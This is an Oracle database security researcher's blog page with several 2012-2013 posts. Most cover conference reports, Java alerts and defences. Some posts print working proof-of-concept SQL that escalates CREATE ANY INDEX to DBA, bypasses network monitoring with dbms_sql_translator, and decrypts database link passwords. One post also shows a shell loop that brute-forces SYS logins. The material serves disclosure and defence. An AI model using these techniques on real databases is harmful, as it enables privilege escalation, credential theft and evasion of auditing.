Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)

Three Tier Oracle Security in London ~ Paul M. Wright RSS Feed
 

INDEX to SYSDBA without SELECT

Hello Oracle Security Readers,

If we combine the following factors together then we can identify an escalation route from Index on SYSTEM to SYSDBA which does not require SELECT privileges on the indexed table:

1. SYSTEM passes it’s DBA role through it’s procedures.

2. Oracle indexes allow execution from read via functions i.e. INDEX can execute a function.

3. Oracle analyses indexes before they are used.

The PoC code is below:


@?/sqlplus/admin/pupbld.sql 

INSERT INTO PRODUCT_USER_PROFILE VALUES ('SQL*Plus', 'TEST', 'MODIFY', NULL, NULL, 'DISABLED', NULL, NULL); 

create user test identified by o; 
grant create session, create procedure, create any index to test; 

SQL*Plus: Release 11.2.0.2.0 Production on Wed Dec 11 09:47:26 2013 
Copyright (c) 1982, 2010, Oracle.  All rights reserved. 
Connected to: 
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - Production 
With the Partitioning, OLAP, Data Mining and Real Application Testing options 

SQL> conn test/o 
Connected. 

SQL> CREATE OR REPLACE FUNCTION test.Y (GASP VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 
PRAGMA AUTONOMOUS_TRANSACTION; 
BEGIN 
EXECUTE IMMEDIATE 'GRANT DBA TO TEST'; 
COMMIT; 
RETURN 'GASP'; 
END; 
/  2    3    4    5    6    7    8   
Function created. 

SQL> grant execute on test.y to public; 
Grant succeeded. 

SQL> create index system.escalation_index on system.SQLPLUS_PRODUCT_PROFILE(test.y('name')); 
Index created. 

SQL> set role dba;  
Role set.

So the ability to create an index can lead to SYSDBA. Oracle have made the above more difficult to achieve in 12c by adding an INHERIT privilege requirement which blocks the above code, and therefore represents another good reason to upgrade from 11g to 12c. I discuss this in my new book along with other issues, for publication in April, and already available to purchase in Alpha format at this URL http://www.apress.com/9781430262114

What sort of defences have organisations been using recently to combat attacks like the above? Surprisingly there has still been a large focus on network monitoring to implement DB Security. I say surprisingly because new DB Sec research has been focused for a while on controlling internal high privilege within the DB. A privileged account can bypass network monitoring even if it is host based. A good example of bypassing a host based network monitor (e.g. SNORT/Guardium et al) is the dbms_sql_translator package introduced with 12c demonstrated below:


conn / as sysdba

SQL> exec dbms_sql_translator.create_profile('BYPASSNETMON');

PL/SQL procedure successfully completed.

SQL> select object_name, object_type from dba_objects where object_name like 'BYPASSNETMON';

OBJECT_NAME
--------------------------------------------------------------------------------
OBJECT_TYPE
-----------------------
BYPASSNETMON
SQL TRANSLATION PROFILE

SQL> exec dbms_sql_translator.register_sql_translation('BYPASSNETMON','select username from dba_users','select user, password from sys.user$')

PL/SQL procedure successfully completed.

SQL> alter session set sql_translation_profile = BYPASSNETMON;

Session altered.

SQL> alter session set events = '10601 trace name context forever, level 32';

Session altered.

SQL> select username from dba_users;

USER
------------------------------
PASSWORD
----------------------------------------
SYS
987B14B42862C0C1

SQL> SELECT GRANTEE FROM DBA_TAB_PRIVS WHERE TABLE_NAME='DBMS_SQL_TRANSLATOR';

GRANTEE
--------------------------------------------------------------------------------
PUBLIC

To achieve this monitoring bypass all that is required is CREATE SQL TRANSLATION PROFILE privilege and ALTER SESSION. Gaining ALTER SESSION has been achievable, as my previous book showed http://www.dba-oracle.com/forensics/t_forensics_vulnerable.htm

And there are other methods to gain ALTER SESSION in newer versions of Oracle DB, and the CREATE SQL TRANSLATION PROFILE privilege is only needed at creation time, so verifying that a session is not being translated surreptitiously requires some expertise. More to come on this.

Ready made methods to alert to the unauthorised use of dbms_sql_translator are the native audit trail, or for high security scenarios a memory monitor such McAfee’s DB Sec monitoring tool here provides high protection http://www.mcafee.com/us/products/database-activity-monitoring.aspx

There are positives from a security perspective in 12c, and of course with Oracle we can add our own defenses. The new book http://www.apress.com/9781430262114 adds these following protections among others:

  1. Incoming DB Link blocking using Native IPS
  2. Forensic rootkit detection
  3. Break-glass Access Control security
  4. Automated statechecking from root
  5. Adaptive security response using EM12c
  6. Fine grained user management
  7. Centralised audit trail lifecycle
  8. Vulnerability scanning for verification using Perl
  9. Securing privileged access control
  10. 12c decryptions and defenses

Anyway I won’t spoil the surprise – so enjoy your weekends!

Cheers,

Paul M. Wright

P.S. Commenting works now as the Maths Captcha plugin has dealt with the spambots

Hacktivity

Hi Guys,

OOW was the trip of a lifetime. Watching Oracle USA win the cup with Ben Ainslie was great, as was watching Larry’s keynote live. Columnar in memory DB looks interesting and competition for Hana.

I presented at the excellent Delphix event with OakTable, and picked up some good information to finalise some more book chapters.

It was good to meet Steven Karam as we had a discussion about ALTER USER IDENTIFIED BY VALUES bypassing account expiry. This is a security loophole in my experience, as it will enable legacy app account owners to avoid renewing their passwords if the Prod DBA expires them.

Off to Hacktivity tomorrow in Hungary to give a talk there on Friday 11th October at 12.40pm

https://hacktivity.com/en/hacktivity-2013/speakers/paul-m-wright1/

I will discuss some of the 12c research which is going into the book, which includes new privilege escalations and a new solution to block all incoming database links, which I am quite pleased with.

More details at hacktivity. See you there!

Cheers,
Paul
P.S. Amazon is taking pre-orders I note http://www.amazon.co.uk/Protecting-Oracle-Database-Paul-Wright/dp/1430262117

OOW and Oak Table

Hi Oracle Security Readers,
OOW is here again and I will be giving a short “In a nutshell” presentation on 12c security which will include – 3 good and 3 not so good points about 12c, as well as future research directions. 
The presentation will be at Table World http://www.kylehailey.com/oaktable-world/agenda/
This can be regarded as a short taster for the upcoming book. http://www.springer.com/computer/database+management+%26+information+retrieval/book/978-1-4302-6211-4

You know 12c does have some good features e.g. Definer Roles for Program Units, which works well, and has the potential to solve the majority of privilege escalations by removing the need for PUBLIC. Also TCPS is free on all DB versions now which is really great. Lots of work needed to test this upgrade integrates with other servers..

However there are some serious issues with 12.1.0.1.0 GA as a release, and also some design weaknesses that need to be borne in mind when implementing 12c. Additionally some of the issues found whilst testing 12c do port back to 11.2.0.3/4 which is a concern now.

I will be discussing the defenses to some of these issues in my Oak Table Presentation, and then later at Hacktivity in October https://hacktivity.com/en/hacktivity-2013/speakers/paul-m-wright1/. So OOW will get the defenses first!

Look forward to seeing you in San Francisco. Lastly I am in the process of transitioning general Oracle Security posts to www.OracleSecurity.Com which is hosted in the US.

Cheers,
Paul

_sys_logon_delay

Hi Oracle Security Folks,

Yes indeed, 12c is out. I have been working on 12c for 1.5 years and gave the first external 12c security presentation (of which I am aware) at UKOUG 2012 in Birmingham, so it is good to see that the product has finally been released. I like that the consolidation features are optional now. A lot of the currently unpublished 12c security research will be going into my Apress book Protecting Oracle (12c), due out in November, but I will be able to give some tasters here as we progress..

Firstly, thank you to Dani Schnider of Trivadis for referencing my Database Link Security paper.
Dani’s paper is available at this URL http://www.trivadis.com/uploads/tx_cabagdownloadarea/05-01-2013_Wie_sicher_sind_Database_Links.pdf and here in English translated by Google. Dani describes the idea of limiting a DB link to a specific account and then adding a context variable to legitimate DB Link logins using that account, which can then be used by the receiving database to grant access or not, using a trigger which checks for the correct context variable.

CREATE OR REPLACE TRIGGER dbl_logon_trg
AFTER LOGON ON DATABASE
DECLARE
v_username VARCHAR2(30) := sys_context('USERENV','SESSION_USER');
v_dbl_info VARCHAR2(200) := sys_context('USERENV','DBLINK_INFO');
BEGIN
IF v_username = 'ETL_USER' THEN
IF v_dbl_info IS NULL THEN
write_log('failed: direct login', v_username, v_dbl_info);
raise_application_error(-20101, 'Direct login not allowed.');
ELSIF v_dbl_info NOT LIKE 'SOURCE_GLOBAL_NAME=DWH_PROD, DBLINK_NAME=ETL_DBL%' THEN
write_log('failed: wrong dblink', v_username, v_dbl_info);
raise_application_error(-20102, 'Login from wrong database link not allowed.');
ELSE
write_log('successful login', v_username, v_dbl_info);
END IF;
END IF;
END dbl_logon_trg;

This is good advice but does not attempt to address the wider issue of how to stop incoming links for all accounts. That is more complex needing “Native Intrusion Protection”…more to come on this in the book.

My DB Link paper was also picked up by Oracle.com https://forums.oracle.com/message/10951663, and is nice to see Oracle openly discussing vulnerability. Mr A.C Hobbs would approve.

Gary Myers also kindly added observations regarding the transportation of a database link from one DB to another https://plus.google.com/117671444215575295808/posts/2kt3ztabToy (as discussed on oracle-l). This feature still works in 11.2.0.3 below — though the ciphertext is longer now..

SQL> CREATE DATABASE LINK MYDBLINK
  2  CONNECT TO MYDBLINKACCOUNT IDENTIFIED BY MYDBLINKPASSWORD USING 'MYTARGEDB';

Database link created.

SQL> SELECT DBMS_METADATA.GET_DDL('DB_LINK',a.db_link,a.owner) FROM dba_db_links a;

DBMS_METADATA.GET_DDL('DB_LINK',A.DB_LINK,A.OWNER)
--------------------------------------------------------------------------------

  CREATE DATABASE LINK "MYDBLINK.ENTERPRISE.INTERNAL.CITY.AC.UK"
   CONNECT TO "MYDBLINKACCOUNT" IDENTIFIED BY VALUES '06D52ACA3DE41DDE1DCFEFC51D
08A1B314C470B8A03EE849C86A3DF703E888E2A8D4B7B3882570A15273FA7681B966EE74739907B6
C6A18AEB8CF7EB1871EA2C41D25342F4C0D102DA2BBAFB8F0330756938B26EEFFFAF5FD69E2CED7C
B2DDF34AB17D15D30E1DFE1C464D1F39D8A3A37EF80FFF8F085D6937D7158EFA503621'
   USING 'MYTARGEDB'

SQL> select * from v$version;

BANNER
--------------------------------------------------------------------------------
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
PL/SQL Release 11.2.0.3.0 - Production
CORE    11.2.0.3.0      Production
TNS for 64-bit Windows: Version 11.2.0.3.0 - Production
NLSRTL Version 11.2.0.3.0 - Production

In my experience having possession of a copy of the ciphertext to create a copy of the link has a much lower impact than gaining the plaintext. Problem is that the plaintext password for low priv dblinks are often the same to the other system accounts.

Of course 11.2.0.3 database links have completely changed how the encryption algorithm works –> it is the same method as 12c. More on this in the book, in November.
May be a good idea to reset those DB Link passwords to unique values. 11.2 and above allows you to alter the password of the dblink directly with this command, another improvement from Oracle.

ALTER DATABASE LINK private_link CONNECT TO hr IDENTIFIED BY hr_new_password;

Database Links are interesting, but in terms of relative risk, the issue of remote SYS brute forcing has caused more concern than any other, partly due to the inability to mitigate. You will probably remember my , SYS connection throttler which was a DIY mitigation to remote brute forcing issue documented in 2007 (Needs FFox)

Well here is some very good news as Oracle have implemented my recommendation, given before and during the Beta, to add a simple hidden parameter to slow down remote SYS brute forcing – and it is set to TRUE by default!

Introducing _sys_logon_delay (beams proudly at new parameter).

This addresses one of the biggest security concerns and I commend Oracle for following my recommendations. The point of this simple delay function is that users will be able to understand it and therefore use it confidently.

while true;do sqlplus -S -L sys/wrongpw@orlin:1521/orcl3 as sysdba;sleep 0;done;

ERROR:
ORA-01017: invalid username/password; logon denied
8< --- Slow steady pace between failed logons thus making remote brute force infeasible.

--can set to 0 to disable, or to higher value to slow down attacker, but needs a restart.
--e.g. alter system set "_sys_logon_delay"=0 scope=spfile;

SQL> select banner from v$version;

BANNER
--------------------------------------------------------------------------------
Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
PL/SQL Release 12.1.0.1.0 - Production
CORE    12.1.0.1.0      Production
TNS for Linux: Version 12.1.0.1.0 - Production
NLSRTL Version 12.1.0.1.0 - Production

Lets have a look and see what the new parameter looks like

SQL> select a.ksppinm name, b.ksppstvl value,b.ksppstdf deflt,
decode (a.ksppity, 1,
'boolean', 2,
'string', 3,
'number', 4,
'file', a.ksppity) type, a.ksppdesc description
from
sys.x$ksppi a,
sys.x$ksppcv b
where   a.indx = b.indx
   and
a.ksppinm ='_sys_logon_delay';  2    3    4    5    6    7    8    9   10   11   12  

NAME
--------------------------------------------------------------------------------
VALUE
--------------------------------------------------------------------------------
DEFLT	  TYPE
--------- ----------------------------------------
DESCRIPTION
--------------------------------------------------------------------------------
_sys_logon_delay
1
TRUE	  number
failed logon delay for sys

It is satisfying to see a large company react positively to customer feedback and to have helped fix this problem. Thanks to everyone involved. There are of course many other problems to solve, as we shall see in due course.

Lastly, courtesy of Oracle/Apress I will be at OOW/JavaOne in September, taking part in a publishing seminar, and looking forward to seeing you there in sunny SF.

Regards,
Paul

Another Java Security Alert

Hi Oracle Security Folks,

Following the tradition for one off Java Security Alerts
Oracle Critical Patch Updates and Security Alerts:
http://www.oracle.com/technetwork/topics/security/alerts-086861.html

Oracle Security Alert for CVE-2013-1493:
http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html

The reporters http://blog.fireeye.com/research/2013/02/yaj0-yet-another-java-zero-day-2.html say it is an unreliable exploit. Of course it depends on Java being used in the browser so one fix is to unplug the JVM from the browser.

For the past ten years I have only used Java as a server side technology,, where it is actually making leaps and bounds. I had the pleasure of taking an Oracle Professional Training class on Java 7 new features recently and there are some very nice concurrency features that make separating and delegating tasks a lot easier to accomplish. This has made Java the predominant language of choice for Universities, and also increased the usage of Netbeans IDE which I have found to be more stable than Eclipse and certainly better for writing JDBC applications. My point is that I think the technologists at Oracle are actually doing quite a good job with Java…back to the DB now in prep for 12c..excitement mounts..

Cheers,
Paul

Oracle Dictionary Integrity Health Check

Hi,

It is good to check the integrity or health of a system to avoid future problems.

DBMS_HM.RUN_CHECK(‘Dictionary Integrity Check’, ‘my_run’);

SET LONG 100000
SET LONGCHUNKSIZE 1000
SET PAGESIZE 1000
SET LINESIZE 512

SELECT DBMS_HM.GET_RUN_REPORT(‘MY_RUN’) from dual;

SQL> SELECT DBMS_HM.GET_RUN_REPORT(‘MY_RUN’) from dual;

DBMS_HM.GET_RUN_REPORT(‘MY_RUN’)
——————————————————————————-
——————————————————————————-
——————————————————————————-
——————————————————————————-
Basic Run Information
Run Name : my_run
Run Id : 141
Check Name : Dictionary Integrity Check
Mode : MANUAL
Status : COMPLETED
Start Time : 2013-02-10 13:46:11.861572 +00:00
End Time : 2013-02-10 13:50:43.713326 +00:00
Error Encountered : 0
Source Incident Id : 0
Number of Incidents Created : 0

Input Paramters for the Run
TABLE_NAME=ALL_CORE_TABLES
CHECK_MASK=ALL

Run Findings And Recommendations
Finding
Finding Name : Dictionary Inconsistency
Finding ID : 142
Type : FAILURE
Status : OPEN
Priority : CRITICAL
Message : SQL dictionary health check: file$ pk 42 on object FILE$
failed
Message : Damaged rowid is AAAAARAABAAAADpAAC – description: Filename
/home/oracle/app/oracle/oradata/orcl/pdbseed/system01.dbf is
referenced

Crikey – lots of output – but what does it all mean?

Alternatively…
SQL> SELECT AVG(dbms_utility.get_hash_value(text,1000000000,power(2,30))) FROM DBA_SOURCE WHERE OWNER=’SYS’;

AVG(DBMS_UTILITY.GET_HASH_VALUE(TEXT,1000000000,POWER(2,30)))
————————————————————-
1564889684
Ahh my dictionary is same as before…cool

SQL> select banner from v$version;

BANNER
——————————————————————————–
Oracle Database 12c Enterprise Edition Release 12.1.0.0.2 – 64bit Beta
PL/SQL Release 12.1.0.0.2 – Beta
CORE 12.1.0.0.2 Beta
TNS for Linux: Version 12.1.0.0.2 – Beta
NLSRTL Version 12.1.0.0.2 – Beta

Cheers,
Paul

Java Security Alert

New Year – New vulnerabilities…yes it’s alert season again, with the main patch out on the 15th, but an out of band alert today for the Java 0 day. It is good to see Oracle taking this well publicised issue so seriously.

Here is the alert – http://www.oracle.com/technetwork/topics/security/alerts-086861.html

For an excellent advanced analysis please see this verified pdf https://partners.immunityinc.com/idocs/Java%20MBeanInstantiator.findClass%200day%20Analysis.pdf

For a more layman’s overview of Java Security this pdf is useful http://www.securingthehuman.org/newsletters/ouch/issues/OUCH-201301_en.pdf

I taught the first publicly available Java Security Course outside of the US in 2007 at SANS London, and wrote the first Java Security exam (GSSP), and wrote and presented the first “Java Top 10 Security issues” in Orlando 2008 – which is still very relevant – and back then the story was the same as it is today… — Java applets are insecure – don’t use them – and strongly consider turning off Java in browsers.
Server-side Java is still a dominant language and probably will be for a while, though Java in the Database itself has had both security and performance issues…as well as questions as to why use Java in the DB – is it to bring more processing to the DB to increase licensing for Oracle, say the cynics, OR to enable less network transactions between app and db pulling data backwards and forwards? Obviously it is nice to have a choice, but PL is a more efficient way to interact with the DB locally.
A larger question in many folks minds will be why use Java at all? It was made popular because Sun had made it cross-platform, but does Oracle have the same cross-platform credibility as Sun? A JVM is slower than native so if x-platform is less of a factor perhaps C will make a comeback. This logic is borne out by http://developers.slashdot.org/story/13/01/07/181219/c-beats-java-as-number-one-language-according-to-tiobe-index. Personally, I do a lot of text file log manipulation so I still use Perl as it is quicker (and have been recommended to try LUA – on the todos), and am intrigued by DBIx http://www.dbix-class.org/.
Agreed, for database connectivity JDBC is still king, so I am still glad I learnt Java at uni many moons ago, but the crux to this is that Java’s expansion market has been Android and the fear is that Oracle’s lawyers scare companies from innovating with the technology in a cross-platform like way. I hope the concept of “Java Stewardship” extends to the legal department.

Anyway, lets hope that the new Oracle patch is reliable.

Keep safe,
Paul

UKOUG 2012 in a nutshell

Hi Oracle Security Folks,

UKOUG 2012 in a nutshell:

OAK Table day highlight was Julian’s analysis of RAT capture formats, which made reverse engineering proprietory formats look a lot easier than it should do. Christian’s super secret talk was so secret that it was not given, but managed to catch up on that later.

Monday my presentation was suprisingly full up (Ok it was a small room), and no one fell asleep or ran screaming so that classifies it as successful in my book. The slides are on UKOUG’s web site but require a logon. In truth the talk went very well and the audience genuinely seemed to appreciate the hard work I had put in, and the contribution made by Co-speaker Philip Weedon.

Afterwards, I wandered over to Grant Allen’s Talk. Grant made contributions from Unix perspective including how to log bash commands to syslog (cool) and re-iterated the benefits of centralising audit trail. Had a chat after and started the post talk celebrations which resulted in going to bed at breakfast time. So that’s why they call it “Bed and Breakfast”. The rest of the two days should be annotated with the fact that it took me approximately two days to recover from the Monday night, but it was worth it as had some very interesting talks about how DBA privilege is actually managed – in practise – which is different from the typical Identity Management perspective…more to come on this..

Tuesday was a later start and helped Pete with the Oracle Security Roundtable which was well attended with lively discussion.
Then Tom’s 12c talk which had some security perspectives. Tom’s presentation skills are second to none and he interacted with Hall 1 audience very naturally. What we know is there are a lot of new features for security in 12c as well a lot of extra products that can be purchased to enhance the security of the database.
Conversely I think the actual core security of the central product has been degraded in some ways. For instance password complexity, account locking, password history, failed login throttling etc are no longer effective on SYS in 11 upwards..and many of the OraSec “experts” and DBA Managers are not aware of this because they are bombarded with extraneous information about extra addons which do not cure the core weaknesses.
I published sys_throttler to address this but a full solution is not trivial..so we can say that Oracle Security is not solved yet.

After Tom we headed to Gregory’s Identity Management talk which was a good overview of how to use OVD to manage DB users, and highlighted that Oracle can unexpectedly support two seperate authentication mechanisms for one user (ref Pete), which is something I also alluded to in http://www.oracleforensics.com/wordpress/index.php/2008/09/21/bypassing-ora-01997/.

Identity Management of lower privileged accounts in Oracle is a good thing, but it certainly becomes more difficult once the users are privileged as they can break the chains that bind them….hence the requirement for a comp balance like auditing..

Pete’s Wednesday 9 AM talk on audit trails, was a bit cloudy in my mind first time round, but reading the slides now they are making sense.
Pete showed using client_identifier as central identity through core audit…excellent battle worn advice.
Also discussed identifying sql injections and killing the session automatically…but difficult for a session to kill itself. This would be handy when trying to automatically defend against an attack. Obviously it is possible to call out to the OS but within the DB this is not so easy…work to do again.
Also Pete mentioned using a trigger to enable core audit to save on performance.
A lot of this changes in 12c but the concepts were very interesting…
Pete then transferred to DBA access control mode and described how the power of the DBA can be controlled through individual proxy users proxying to a core dba role which is customised. This is a good strategy for BAU. The problem is of course that to carry out imports/exports and user management the ALTER USER privilege is needed and any user with this or execute on dbms_sys_sql etc can act as a different user so it is not a solution for highest privilege.
Breakglass and time-based access control is the way forward for taming the top dog privileges in my view/experience…though splitting SYSDBA into seperate system privileges goes towards taming SYS e.g. SYSBACKUP and SYSAUD et al.

Pythian were prominent with some interesting work on Human reliability and Privileged Access Monitoring. Absolute applications were busy with their training offerings and DSP had 6 presentations so the vendor element looked healthy.

I would have liked to have gone to…
-Guido Schmutz’s NoSQL presentation but the PDF reads well.
-Carl Dudley’s Audit trail presentation was thorough and of immediate practicable use in 11g.
-Owen Ireland’s Goldengate presentation is an excellent quick start intro for DBA.
-Hitachi’s Muthukumar did a detailed presentation on localisation in Oracle for EU.
-Portix’s Bjorn Rost did an informative presentation on Total Recall listing the virtual columns and AS OF syntax.
Of course there are loads others, these are just the presentations that caught my eye.

The general opinion was that the conference was better than last year. I can’t vouch for that as I wasn’t there last year due to work commitments, but I certainly enjoyed catching up with old friends. Next year I am informed the conference for DB will be in Manchester which is the home of my MSc CS department, Mr Turing, and some of the best music to grace our charts, as well as a special breed of mega pub (ref Moon Under the Water), though the Lass O’ Gowrie aims for quality rather than quantity. In short Manchester is literally a cool place and thankfully still serviced by Virgin trains, so see you there next year.

Thank you to all the excellent presenters this year who have increased my understanding yet again.
It is interesting to see how California’s Oracle User group compares http://www.nocoug.org/presentations.html

Cheers,
Paul

SYS Security

Hello Folks,

A few people have told me that they thought only SYS could select db link passwords.
Truth is any user with SELECT_CATALOG_ROLE can select the passwords from ku$_dblink_view as well.

SQL> select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) password from ku$_dblink_view;

NAME
--------------------------------------------------------------------------------
USERID
------------------------------
PASSWORD
--------------------------------------------------------------------------------
TEST_LINK.ENTERPRISE.INTERNAL.UK
DBLINK_ACCOUNT
mongo

If missing execute on dbms_crypto then may need to copy over the ciphertext to another DB under the control of the attacker.

ku$_dblink_view select from SELECT_CATALOG_ROLE is fixed in 11.2.0.3 and above, as is the “stealth password cracking vulnerability” which has gained a lot of attention, and resulted in updates to John and Ettercap.

So which account would be the likely target of this stealth attack? …
The only account that is guaranteed to be present and unlocked is SYS..
For both the stealth brute force and my orabrute style brute force the primary defence is the strength of the SYS password.
If the SYS password is a 15 character passphrase that is changed regularly then the attacks are ineffective. So how to ensure SYS password is complex and the account is secure?
Problem is SYS is immune to profiles in 11g, so no password history, no account locking, and no failed logon delay and crucially no password complexity function.
The SYS password could be ‘a’ and no-one else would be the wiser.

[oracle@localhost ~]$ sqlplus sys/lowsec@localhost/orcl as sysdba

SQL*Plus: Release 11.2.0.2.0 Production on Wed Nov 28 20:40:57 2012

Copyright (c) 1982, 2010, Oracle.  All rights reserved.


Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> alter user sys identified by a;

User altered.

SQL> alter user system identified by a;
alter user system identified by a
*
ERROR at line 1:
ORA-28003: password verification for the specified password failed
ORA-20001: Password length less than 8

The DBA might not even realise the password is ‘a’ if they are coming in through Unix ” / as sysdba “.
SYS can even silently turn off it’s own audit through oradebug so no record of the attack either.

So SYS really is “special”, but will this improve in 12c…? Answers at UKOUG.

Cheers,
Paul

Database Link Security

Hello Oracle Security folks,

Good news and bad news – which would you like first?

Ok.. so the bad news is that these user/role/privileges can select and decrypt DBLink passwords on 11.2, as the key to decrypt the ciphertext is included in the password itself.
•SYS
•SYSDBA
•DBA
•SYS WITHOUT SYSDBA
•SYSASM
•EXP_FULL_DATABASE
•DATAPUMP_EXP_FULL_DATABASE
•DATAPUMP_IMP_FULL_DATABASE

PoC:

SQL> CREATE DATABASE LINK "TEST_LINK" CONNECT TO "DBLINK_ACCOUNT" IDENTIFIED BY MYPW USING '(DESCRIPTION=(ADDRESS_LIST=(ADDRESS =(PROTOCOL=TCP)(HOST=192.168.0.25)(PORT=1521)))(CONNECT_DATA=(SERVICE_NAME=ORCL11)))';

Database link created.

SQL> select name, userid, passwordx from sys.link$ where name='TEST_LINK';
NAME
--------------------------------------------------------------------------------
USERID
------------------------------
PASSWORDX
--------------------------------------------------------------------------------
TEST_LINK
DBLINK_ACCOUNT
058CC531A7BBC08390C066B29CB2E26AF1

SQL> select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) from sys.link$ where name='TEST_LINK';

NAME
--------------------------------------------------------------------------------
USERID
------------------------------
PASSWORD
--------------------------------------------------------------------------------
TEST_LINK
DBLINK_ACCOUNT
MYPW

The above issue did not make my Top 10 New Oracle Security Issues which I will publish at UKOUG 2012 on Monday http://2012.ukoug.org/default.asp?p=9339&dlgact=shwprs&prs_prsid=7736&day_dayid=62.

So the good news is that Oracle audit trail does now highlight incoming DBLink activity including the name of the link from the client database.

select userid, terminal, comment$text from sys.aud$ where comment$text like 'DBLINK%';
USERID         NTIMESTAMP#          USERHOST  COMMENT$TEXT
------------  -----------------     -------   --------------
DBLINK_ACCOUNT	19-NOV-12 01.42.16.305194000	orlin	DBLINK_INFO: (SOURCE_GLOBAL_NAME=orcl.4294967295)
DBLINK_ACCOUNT	19-NOV-12 01.42.17.086395000	orlin	DBLINK_INFO: (SOURCE_GLOBAL_NAME=orcl.4294967295)
DBLINK_ACCOUNT	19-NOV-12 01.42.17.086856000	orlin	DBLINK_INFO: (SOURCE_GLOBAL_NAME=orcl.4294967295)

This DBLINK_INFO is very useful and the attached paper expands a little on the subject of DBLink security including Forensic Response…more to come at UKOUG in Birmingham.

Cheers,
Paul